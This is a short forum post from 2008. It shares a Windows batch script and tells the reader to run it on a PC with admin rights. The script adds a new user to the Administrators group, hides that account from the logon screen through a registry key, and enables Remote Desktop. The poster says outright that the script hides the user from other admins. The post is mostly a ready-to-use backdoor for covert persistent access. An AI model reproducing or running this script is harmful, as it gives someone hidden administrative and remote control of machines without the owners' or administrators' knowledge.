View Single Post
Invasive contributor
21Jul2008,17:03  
XXxxImmortalxxXX's Avatar
Hell you can

First you have to on a pc that has admin rights after that type this in


Code:
@Echo Off

SET /P usr=[Enter new username here:]

SET /P pwd=[Enter new password here:]

:: SET /P takes the user input and puts it into the variable.

echo — Creating New User, “%usr%” with password “%pwd%” –

net user “%usr%” “%pwd%” /add

echo — Adding User to Group Administrator –

net localgroup Administrators %usr% /add

echo — User Is Now Administrator — >>

echo — Hidding User –

REG ADD HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList /v %usr% /t REG_DWORD /d 0 /f

echo — Activating Terminal Service –

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server /v fDenyTSConnections /t REG_DWORD /d 0

echo — Activating Terminal Service Done –

SET /P =Press Enter to continue . . .

Exit

Then it will work it will also hide you from other admins making you hidden from ppl to see


Hope it helps